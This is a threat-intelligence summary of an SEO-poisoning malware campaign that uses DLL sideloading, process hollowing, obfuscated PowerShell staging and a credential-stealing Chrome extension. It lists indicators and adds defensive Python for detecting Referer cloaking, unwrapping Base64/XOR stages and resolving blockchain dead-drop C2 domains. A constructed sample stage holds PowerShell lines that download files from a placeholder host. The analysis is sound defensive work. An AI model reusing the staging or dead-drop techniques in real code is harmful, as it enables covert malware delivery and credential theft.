Keypoints
- Threat actors create fraudulent sites on popular hosting/blogging platforms and use SEO poisoning to push those sites into search results, increasing drive-by victimization.
- Sites check the HTTP Referer header and redirect only search-engine-referred visitors to the next stage, using heavy JavaScript obfuscation to hinder analysis.
- Payload delivery uses a two-level ZIP (inner ZIP password hidden in an image) to hide the malicious installer from automated inspection.
- The installer drops a malicious DLL (libgcrypt-20.dll) alongside a genuine GPG binary and relies on DLL sideloading and process hollowing to execute the payload within explorer.exe.
- Explorer.exe is used to launch PowerShell with a hidden command-line that downloads a multi-layer obfuscated Base64 payload which is then XOR-decoded and deobfuscated to produce malicious JavaScript files and extension components.
- A malicious browser extension is installed (via a created Chrome shortcut using --load-extension) that contacts C2 (C2 location retrieved via blockchain.info lookup), harvests browser cookies/credentials/fingerprints, and injects/modifies webmail to capture OTPs and crypto-related emails.
- Network artefacts include multiple malicious domains and download URLs used to fetch DLLs and BIN files; Zscaler mapped several file hashes and hundreds of scam Weebly sites tied to the campaign.
MITRE Techniques
- [T1566] Phishing – SEO poisoning used to manipulate search results and lure victims: [‘Threat actors intentionally create these sites to spread malware by using the proliferation of web hosting platforms to manipulate search engine results’]
- [T1027] Obfuscated Files or Information – Heavy JavaScript and multilayer Base64/XOR obfuscation to hide redirection and payload logic: [‘This obfuscation method employs string concatenation and mathematical manipulation to hide the code’s logic.’]
- [T1055] Process Injection (Process Hollowing) – Attacker creates a suspended explorer.exe, unmaps and replaces its memory, writes payload, and resumes thread to run injected code: [‘it triggers the execution of explorer.exe and utilizes process hollowing techniques.’]
- [T1574] Hijack Execution Flow (DLL Side-loading) – Malicious DLL dropped alongside legitimate GPG installer and loaded via DLL sideloading (libgcrypt-20.dll): [‘malicious DLL libgcrypt-20.dll loaded using DLL sideloading.’]
- [T1059.001] Command and Scripting Interpreter: PowerShell – Hidden PowerShell invocation downloads and decodes obfuscated script (special-character replacement, Base64, XOR): [‘PowerShell executable, passing along a malicious command-line argument, -windowstyle hidden’]
- [T1105] Ingress Tool Transfer – Downloader components fetch additional DLL/BIN files and scripts from remote domains (aprel88[.]com, t9z[.]lol, 1blob[.]monster): [‘download a malicious DLL from t9z[.]lol/imvLbzv05W’]
Indicators of Compromise
- [Domain/URL] Downloader/C2 endpoints – aprel88[.]com/getLicenseInfo.php?requirements=time&checkMethod=2, t9z[.]lol/imvLbzv05W, and other domains like 1blob[.]monster/pidaras/142.bin
- [Domain] Extension/file hosting domains – good2-led[.]com/dark4.bs64, dark-confusion[.]com (C2 resolved via blockchain lookup)
- [File hashes] Sample payload hashes – 26B980E5A79883830EBE9E588867F9A7, E0B000BD86ACE23AB5D94FC44480D8B3, and 2ECE1BB679CB143D84BBA1F114288101
- [File names] Installer and malicious DLL – setup.exe (malicious installer that also installs GPG) and libgcrypt-20.dll (malicious sideloaded DLL)
- [Scam sites] Weebly-hosted fraudulent pages – goodclassic.weebly.com, entrancementace.weebly.com, and many more scam weebly subdomains used to host fake MediaFire pages (dozens listed)
- [Blockchain/Bitcoin addresses] C2 discovery via blockchain lookup – bc1qnxwt7sr3rqatd6efjyym3nsgxhslyzeqndhjpn (address queried on blockchain.info) and 1A9mJv7MHkSzMqe4TEdfyttEz9ZcZugyLR (address returned by the lookup and decoded to derive dark-confusion[.]com)
Threat actors hosted SEO-poisoned pages on legitimate blogging platforms and used Referer checks to serve malicious content only to search-engine-referred visitors. The landing page contained heavily obfuscated JavaScript that, after deobfuscation, redirected victims to a fake MediaFire-style download page. The delivered payload was packaged as a nested ZIP (inner ZIP password embedded in an image), so manual extraction was required to reach the installer.
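The Referer-gated behaviour described above is something an analyst can test for directly: request the same URL with no Referer and with search-engine Referers, and compare what comes back. The following check is an added example written for this summary, not code from Zscaler or from the campaign; the fetcher is injected so the logic runs offline against a constructed fake site, and the placeholder hostnames are invented.

```python
import re
from dataclasses import dataclass, field
from typing import Callable, Dict


@dataclass
class Response:
    status: int
    headers: Dict[str, str] = field(default_factory=dict)
    body: str = ""


# A fetcher takes (url, request headers) and returns a Response. Injecting it keeps the
# check offline-testable; a live fetcher would wrap urllib.request with the same signature.
Fetcher = Callable[[str, Dict[str, str]], Response]

SEARCH_REFERERS = (
    "https://www.google.com/",
    "https://www.bing.com/",
    "https://duckduckgo.com/",
)

# Cheap textual redirect signals; obfuscated JavaScript will usually evade these,
# which is why the verdict below rests on the body differing, not on this regex alone.
REDIRECT_RE = re.compile(
    r"http-equiv=[\"']?refresh|(?:window|document|top)\.location(?:\.href)?\s*=|location\.replace\(",
    re.I,
)


def signals_redirect(resp: Response) -> bool:
    """True for an HTTP 3xx with Location, a meta refresh, or a visible JavaScript location change."""
    headers = {k.lower(): v for k, v in resp.headers.items()}
    if 300 <= resp.status < 400 and "location" in headers:
        return True
    return bool(REDIRECT_RE.search(resp.body))


def check_referer_cloaking(url: str, fetch: Fetcher) -> dict:
    """Fetch once without a Referer and once per search-engine Referer, then compare.

    A page that serves different content to search-referred visitors is flagged as cloaked;
    the per-Referer redirect flags tell the analyst whether the difference is a hand-off."""
    baseline = fetch(url, {})
    baseline_redirects = signals_redirect(baseline)
    per_referer = {}
    for ref in SEARCH_REFERERS:
        resp = fetch(url, {"Referer": ref})
        per_referer[ref] = {
            "redirects": signals_redirect(resp),
            "body_differs": resp.body != baseline.body,
        }
    cloaked = any(v["body_differs"] for v in per_referer.values())
    return {
        "url": url,
        "baseline_redirects": baseline_redirects,
        "per_referer": per_referer,
        "cloaked": cloaked,
    }


# Constructed fake site reproducing the behaviour described above: a bland blog page for
# direct visitors, a JavaScript redirect for anyone arriving from a search engine.
BENIGN_HTML = "<html><body><h1>Free classic downloads</h1><p>Welcome to my blog.</p></body></html>"
REDIRECT_HTML = "<html><script>window.location.href='https://download.placeholder.invalid/file';</script></html>"


def fake_cloaking_site(url: str, headers: Dict[str, str]) -> Response:
    ref = headers.get("Referer", "")
    if any(ref.startswith(s) for s in SEARCH_REFERERS):
        return Response(200, {"Content-Type": "text/html"}, REDIRECT_HTML)
    return Response(200, {"Content-Type": "text/html"}, BENIGN_HTML)


def fake_honest_site(url: str, headers: Dict[str, str]) -> Response:
    return Response(200, {"Content-Type": "text/html"}, BENIGN_HTML)


if __name__ == "__main__":
    print(check_referer_cloaking("https://landing.placeholder.invalid/", fake_cloaking_site))
```

On a live page, normalise volatile content (nonces, timestamps, CSRF tokens) before comparing bodies, otherwise ordinary dynamic pages will also look cloaked; and run the baseline request first, since some sites serve the hand-off page only once per client.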
Running the supplied setup.exe installs the legitimate GPG binary while dropping a malicious DLL (libgcrypt-20.dll) into the same folder; the malware relies on DLL sideloading to execute. The DLL then spawns a suspended explorer.exe and performs process hollowing using Windows APIs including the undocumented CreateProcessInternalA and NtUnmapViewOfSection together with VirtualAllocEx, WriteProcessMemory and ResumeThread, to run an injected payload. That payload launches PowerShell with a hidden window and a command-line that fetches a Base64 payload in which certain characters have been substituted; the script restores them, decodes the result (FromBase64String) and XOR-deobfuscates it (keys 167 and 18) to reveal additional scripts.
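The staging layers just described (character substitution, Base64, then XOR with 167 and 18) are the kind of thing an analyst reimplements once to unpack every blob the stager fetches. The decoder below is an added example for this summary, not Zscaler's code or the actor's script; the page does not say which characters the stager substitutes, so the substitution table, the order in which the two XOR keys are applied, the sample next-stage script and its placeholder host are all constructed here.

```python
import base64
import re

# ASSUMPTION (constructed): the page does not name the substituted characters, so this table
# is invented to show the shape of the unwrapping. Keys are the symbols found in the blob,
# values are the Base64 characters they stand in for.
CHAR_SUBST = {"!": "A", "@": "Q", "#": "+", "$": "/", "%": "="}

# XOR keys named on the page; ASSUMPTION: applied as two single-byte passes in this order.
XOR_KEYS = (167, 18)


def xor_bytes(data: bytes, key: int) -> bytes:
    """Single-byte XOR, the operation a PowerShell -bxor loop performs."""
    return bytes(b ^ key for b in data)


def unwrap_stage(blob: str) -> bytes:
    """Reverse the stager's three layers: character substitution, Base64, then XOR."""
    text = blob
    for symbol, b64_char in CHAR_SUBST.items():
        text = text.replace(symbol, b64_char)
    raw = base64.b64decode(text, validate=True)  # equivalent of [Convert]::FromBase64String
    for key in XOR_KEYS:
        raw = xor_bytes(raw, key)
    return raw


def wrap_stage(plain: bytes) -> str:
    """Inverse of unwrap_stage; used only to build the constructed sample blob."""
    data = plain
    for key in reversed(XOR_KEYS):
        data = xor_bytes(data, key)
    text = base64.b64encode(data).decode("ascii")
    for symbol, b64_char in CHAR_SUBST.items():
        text = text.replace(b64_char, symbol)
    return text


URL_RE = re.compile(r"https?://[A-Za-z0-9.\-]+(?:/[^\s'\"]*)?")
FILE_RE = re.compile(r"[A-Za-z0-9_\-]+\.(?:js|dll|bin|ps1)\b")


def triage(decoded: bytes) -> dict:
    """Pull the indicators an analyst wants first from a decoded stage: URLs and dropped file names."""
    text = decoded.decode("latin-1")
    return {
        "urls": sorted(set(URL_RE.findall(text))),
        "files": sorted(set(FILE_RE.findall(text))),
    }


# Constructed next-stage script: the host is a placeholder, not an indicator from the page;
# the file names echo the extension components named in the write-up.
SAMPLE_STAGE2 = (
    b"$d = \"$env:APPDATA\\ext\"; New-Item -ItemType Directory -Force $d | Out-Null\n"
    b"Invoke-WebRequest 'http://stager.placeholder.invalid/gmail.js' -OutFile \"$d\\gmail.js\"\n"
    b"Invoke-WebRequest 'http://stager.placeholder.invalid/main.js' -OutFile \"$d\\main.js\"\n"
)
SAMPLE_BLOB = wrap_stage(SAMPLE_STAGE2)

if __name__ == "__main__":
    recovered = unwrap_stage(SAMPLE_BLOB)
    assert recovered == SAMPLE_STAGE2
    print(triage(recovered))
```

Because XOR is commutative, two passes with 167 and 18 collapse to one pass with 167 ^ 18 = 181; keeping them separate here mirrors the script's own steps so the decoder can be checked against it layer by layer.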
Post-deobfuscation, PowerShell drops multiple JavaScript files that install a malicious Chrome extension (a desktop shortcut points Chrome at --load-extension=). The extension contacts C2 (C2 location obtained by decoding a Base58 string retrieved from blockchain.info address lookups), exfiltrates system/browser data (cookies, credentials, fingerprints), and injects/modifies webmail content (gmail.js/main.js) to intercept withdrawal emails and six-digit authentication codes for targeted crypto exchanges.
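Dead-drop resolution through a blockchain explorer, as described above, means the C2 domain can be recovered by anyone who can reproduce the lookup and the decode, which is useful when the extension is being analysed offline. The resolver below is an added example for this summary, not Zscaler's code or the extension's own logic. The page says only that a Base58 string from a blockchain.info address lookup is decoded; the exact layout assumed here (a P2PKH-shaped address whose 20-byte hash field is the NUL-padded ASCII domain, with a valid checksum), the response structure, and the sample address are all constructed, and the sample address is not the one listed in the indicators.

```python
import hashlib
import json
import re
from typing import Optional

B58_ALPHABET = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"


def b58decode(text: str) -> Optional[bytes]:
    """Plain Base58 decode (Bitcoin alphabet); None if a character is outside the alphabet."""
    value = 0
    for ch in text:
        idx = B58_ALPHABET.find(ch)
        if idx < 0:
            return None
        value = value * 58 + idx
    body = value.to_bytes((value.bit_length() + 7) // 8, "big") if value else b""
    leading = len(text) - len(text.lstrip("1"))  # each leading '1' encodes a 0x00 byte
    return b"\x00" * leading + body


def b58encode(data: bytes) -> str:
    """Base58 encode; used here only to construct the sample address."""
    value = int.from_bytes(data, "big")
    out = ""
    while value:
        value, rem = divmod(value, 58)
        out = B58_ALPHABET[rem] + out
    leading = len(data) - len(data.lstrip(b"\x00"))
    return "1" * leading + out


def checksum(payload: bytes) -> bytes:
    """Bitcoin address checksum: first four bytes of double SHA-256."""
    return hashlib.sha256(hashlib.sha256(payload).digest()).digest()[:4]


DOMAIN_RE = re.compile(r"^[a-z0-9-]+(?:\.[a-z0-9-]+)+$")


def domain_from_address(address: str) -> Optional[str]:
    """Return the domain if the address's 20-byte hash field is ASCII shaped like a hostname.

    ASSUMPTION (constructed): version byte, NUL-padded domain in the hash160 slot, 4-byte
    checksum. The checksum test weeds out mistyped or truncated strings before decoding."""
    raw = b58decode(address)
    if raw is None or len(raw) != 25 or checksum(raw[:21]) != raw[21:]:
        return None
    try:
        text = raw[1:21].rstrip(b"\x00").decode("ascii")
    except UnicodeDecodeError:
        return None
    return text if DOMAIN_RE.match(text) else None


def resolve_c2(rawaddr_json: str) -> Optional[str]:
    """Walk a blockchain.info-style rawaddr document and return the first output address
    that decodes to a domain. That API lists newest transactions first, so the first hit
    is the most recently published value."""
    doc = json.loads(rawaddr_json)
    for tx in doc.get("txs", []):
        for out in tx.get("out", []):
            found = domain_from_address(out.get("addr", ""))
            if found:
                return found
    return None


def build_sample_address(domain: str) -> str:
    """Constructed helper: encode a domain into a checksum-valid P2PKH-shaped address."""
    payload = b"\x00" + domain.encode("ascii").ljust(20, b"\x00")
    return b58encode(payload + checksum(payload))


# Constructed sample response: shape follows the rawaddr endpoint, values are invented
# except the embedded domain, which is the C2 domain named in this write-up.
SAMPLE_RESPONSE = json.dumps({
    "address": "bc1placeholderqueriedaddress",
    "txs": [{
        "hash": "00" * 32,
        "out": [
            {"addr": "1BitcoinEaterAddressDontSendf59kuE", "value": 546},  # ordinary address, no domain
            {"addr": build_sample_address("dark-confusion.com"), "value": 546},
        ],
    }],
})

if __name__ == "__main__":
    print(resolve_c2(SAMPLE_RESPONSE))
```

For detection, the useful observation is the traffic pattern rather than the decode: a browser extension that queries a blockchain explorer's address API and then opens a connection to a freshly seen domain is a strong signal regardless of how the string is encoded.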
Read more: https://www.zscaler.com/blogs/security-research/black-hat-seo-leveraged-distribute-malware